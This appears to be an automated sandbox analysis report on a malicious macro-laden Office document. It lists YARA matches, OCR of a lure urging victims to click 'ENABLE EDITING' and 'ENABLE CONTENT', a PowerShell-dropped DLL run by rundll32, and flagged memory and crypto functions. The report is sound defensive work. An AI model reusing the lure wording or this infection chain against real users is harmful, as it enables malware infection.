Source: Yara match	File source: 12.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd"
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd" N@m 13 ;a 10096 G) FI
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. . . . . O a S
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. . . . . O a S
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Jump to dropped file

Very long command line found

Source: unknown	Process created: Commandline size = 7696
Source: unknown	Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7605	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Lkvi\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D270	7_2_1000D270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011EA7	7_2_10011EA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012750	7_2_10012750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012B5C	7_2_10012B5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001237C	7_2_1001237C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012F7C	7_2_10012F7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296C05	7_2_00296C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294121	7_2_00294121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A4DAD	7_2_002A4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC19B	7_2_002AC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296E8A	7_2_00296E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A533C	7_2_002A533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029FB04	7_2_0029FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00299716	7_2_00299716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029E360	7_2_0029E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA7E4	7_2_002AA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002983F0	7_2_002983F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294828	7_2_00294828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5060	7_2_002A5060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A0C65	7_2_002A0C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A1C79	7_2_002A1C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029F471	7_2_0029F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029D04B	7_2_0029D04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029884A	7_2_0029884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C8A5	7_2_0029C8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AD08F	7_2_002AD08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029F099	7_2_0029F099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA094	7_2_002AA094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029B0E1	7_2_0029B0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A68CB	7_2_002A68CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029792C	7_2_0029792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029E924	7_2_0029E924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5D36	7_2_002A5D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00295D0E	7_2_00295D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A2513	7_2_002A2513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A8978	7_2_002A8978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC95E	7_2_002AC95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294D5F	7_2_00294D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002981A0	7_2_002981A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002959B8	7_2_002959B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AB19F	7_2_002AB19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00298994	7_2_00298994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A39E1	7_2_002A39E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00291600	7_2_00291600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A3600	7_2_002A3600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00293618	7_2_00293618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029D668	7_2_0029D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029766F	7_2_0029766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029427A	7_2_0029427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A8E79	7_2_002A8E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A2A7D	7_2_002A2A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A7A50	7_2_002A7A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A72AE	7_2_002A72AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A0EA0	7_2_002A0EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296ABA	7_2_00296ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002912B6	7_2_002912B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA2EA	7_2_002AA2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A9AE2	7_2_002A9AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00297AE4	7_2_00297AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029DEC9	7_2_0029DEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029D2CE	7_2_0029D2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A12D1	7_2_002A12D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A76D5	7_2_002A76D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029BB28	7_2_0029BB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A0705	7_2_002A0705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A8313	7_2_002A8313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5B60	7_2_002A5B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5748	7_2_002A5748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296342	7_2_00296342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00292746	7_2_00292746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A3745	7_2_002A3745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029DB5B	7_2_0029DB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00298F55	7_2_00298F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00293FAB	7_2_00293FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002967AC	7_2_002967AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029B3A2	7_2_0029B3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002ACBB0	7_2_002ACBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029FFB5	7_2_0029FFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029EF80	7_2_0029EF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00293B97	7_2_00293B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029B7F8	7_2_0029B7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002933F4	7_2_002933F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C3C2	7_2_0029C3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A6005	8_2_001A6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A3C28	8_2_001A3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A7C4A	8_2_001A7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AC44B	8_2_001AC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B1079	8_2_001B1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AE871	8_2_001AE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B4460	8_2_001B4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B0065	8_2_001B0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AE499	8_2_001AE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B9494	8_2_001B9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BC48F	8_2_001BC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001ABCA5	8_2_001ABCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B5CCB	8_2_001B5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AA4E1	8_2_001AA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B1913	8_2_001B1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A510E	8_2_001A510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B5136	8_2_001B5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A6D2C	8_2_001A6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A3521	8_2_001A3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001ADD24	8_2_001ADD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BBD5E	8_2_001BBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A415F	8_2_001A415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B7D78	8_2_001B7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BB59B	8_2_001BB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BA59F	8_2_001BA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A7D94	8_2_001A7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A4DB8	8_2_001A4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B41AD	8_2_001B41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A75A0	8_2_001A75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B2DE1	8_2_001B2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A2A18	8_2_001A2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A0A00	8_2_001A0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B2A00	8_2_001B2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001C1600	8_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B6E50	8_2_001B6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A367A	8_2_001A367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B8279	8_2_001B8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B1E7D	8_2_001B1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001ACA68	8_2_001ACA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A6A6F	8_2_001A6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A628A	8_2_001A628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A5EBA	8_2_001A5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001C12B6	8_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A06B6	8_2_001A06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B66AE	8_2_001B66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B02A0	8_2_001B02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B06D1	8_2_001B06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B6AD5	8_2_001B6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AD2C9	8_2_001AD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AC6CE	8_2_001AC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B96EA	8_2_001B96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B8EE2	8_2_001B8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A6EE4	8_2_001A6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B7713	8_2_001B7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A8B16	8_2_001A8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AEF04	8_2_001AEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AFB05	8_2_001AFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B473C	8_2_001B473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AAF28	8_2_001AAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001ACF5B	8_2_001ACF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A8355	8_2_001A8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B4B48	8_2_001B4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A5742	8_2_001A5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A1B46	8_2_001A1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B2B45	8_2_001B2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AD760	8_2_001AD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B4F60	8_2_001B4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A2F97	8_2_001A2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AE380	8_2_001AE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BBFB0	8_2_001BBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AF3B5	8_2_001AF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A33AB	8_2_001A33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A5BAC	8_2_001A5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AA7A2	8_2_001AA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AB7C2	8_2_001AB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AABF8	8_2_001AABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A77F0	8_2_001A77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A27F4	8_2_001A27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B9BE4	8_2_001B9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206C05	10_2_00206C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206E8A	10_2_00206E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00204121	10_2_00204121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021533C	10_2_0021533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020FB04	10_2_0020FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00209716	10_2_00209716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020E360	10_2_0020E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00215748	10_2_00215748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00214DAD	10_2_00214DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021C19B	10_2_0021C19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021A7E4	10_2_0021A7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002083F0	10_2_002083F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00204828	10_2_00204828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00201600	10_2_00201600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00213600	10_2_00213600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203618	10_2_00203618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00215060	10_2_00215060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00210C65	10_2_00210C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020D668	10_2_0020D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020766F	10_2_0020766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020F471	10_2_0020F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00211C79	10_2_00211C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00218E79	10_2_00218E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020427A	10_2_0020427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00212A7D	10_2_00212A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020884A	10_2_0020884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020D04B	10_2_0020D04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00217A50	10_2_00217A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00210EA0	10_2_00210EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020C8A5	10_2_0020C8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002172AE	10_2_002172AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002012B6	10_2_002012B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206ABA	10_2_00206ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021D08F	10_2_0021D08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021A094	10_2_0021A094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020F099	10_2_0020F099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020B0E1	10_2_0020B0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00219AE2	10_2_00219AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00207AE4	10_2_00207AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021A2EA	10_2_0021A2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020DEC9	10_2_0020DEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002168CB	10_2_002168CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020D2CE	10_2_0020D2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002112D1	10_2_002112D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002176D5	10_2_002176D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020E924	10_2_0020E924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020BB28	10_2_0020BB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020792C	10_2_0020792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00215D36	10_2_00215D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00210705	10_2_00210705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00205D0E	10_2_00205D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00218313	10_2_00218313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00212513	10_2_00212513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00215B60	10_2_00215B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00218978	10_2_00218978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206342	10_2_00206342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00213745	10_2_00213745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00202746	10_2_00202746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208F55	10_2_00208F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020DB5B	10_2_0020DB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021C95E	10_2_0021C95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00204D5F	10_2_00204D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002081A0	10_2_002081A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020B3A2	10_2_0020B3A2
